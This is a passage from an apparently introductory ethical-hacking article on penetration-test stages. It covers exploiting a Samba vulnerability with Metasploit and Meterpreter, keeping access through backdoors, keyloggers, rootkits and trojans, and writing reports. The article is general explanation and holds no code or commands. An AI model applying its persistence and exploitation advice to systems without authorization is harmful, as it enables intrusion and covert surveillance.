Metasploit has an advanced payload called Meterpreter. Once you have gained access to the target system, Meterpreter gives you options like opening webcams, dumping password hashes, and so on. Meterpreter also lives in the memory of the target, so it is very hard to detect.

For example, if your scan results tell you that the target has Samba version 3.5, you can use the Samba CVE-2017–7494 Remote Code Execution Vulnerability to send a payload through Metasploit and gain access to the target system.

Metasploit also has a GUI tool called Armitage. Armitage helps you visualize targets and it recommends exploits by matching the vulnerabilities with the exploits database.

Maintaining Access

Gaining access to systems is not easy, especially on corporate networks. After all the hard work you have done to exploit a system, it won't make sense to go through the same process to exploit the target again.

This is where maintaining access comes in. You can install backdoors, keyloggers, and other pieces of code that let you into the system whenever you want.

Metasploit gives you tools like keyloggers and Meterpreter backdoors to maintain access to an exploited system. You can also install custom Rootkits or Trojans after gaining access.

A rootkit is a piece of code that lets the attacker have admin access to the system it is attached to. Rootkits can also be installed when you download files from malicious websites.

Trojan horses are software that looks like useful software (for example, adobe photoshop) but can contain a hidden piece of malicious software. This is common among pirated software where attackers embed trojans within popular software like MS Office.

Reporting

Reporting is the final part of a penetration test. It is what differentiates between an attacker and an ethical hacker.

Once your penetration test is complete, you summarize all the steps you have taken from recon to gaining access. This will help the organization to understand its security architecture and defend itself better.

A report is also useful when you are working as a team. You will not be able to conduct a penetration test for a large organization alone. Reports also make the client understand the efforts of the team and help justify the compensation.

Here is a sample report created after a successful penetration test.

Summary

Cybersecurity is a great career choice, especially during these uncertain times. More devices are exposed to the network every single day. It is the job of the penetration tester to help defend an organization’s network.

Hope this article helped you understand the different stages of a penetration test. To learn more about Ethical Hacking or Artificial Intelligence, you can visit my blog.